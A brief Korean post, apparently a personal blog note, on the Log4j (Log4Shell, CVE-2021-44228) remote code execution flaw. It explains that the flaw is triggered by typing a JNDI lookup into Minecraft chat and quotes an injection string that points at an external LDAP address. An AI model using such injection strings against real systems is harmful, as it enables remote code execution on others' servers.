Remote Code Exeuction 취약점이 Apache log4j (자바쪽 생태계에서는 거의 대부분 이 프레임워크로 로그 핸들링을 하는 것으로 알고 있다)에서 발견되었다고 한다. 취약점 발견은 마인크래프트 채팅방의 메세지에 JNDI의 lookup 함수를 부르게 되는 패턴을 입력하면 된다고 함. ${jdni:ldap://address/bb} 이런 식이다. address로도 외부 서버로 메세지가 나갈 수 있고 bb 부분에서도 문제가 생길 수 있는듯. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228 CVE - CVE-2021-44228 Apache Log4j2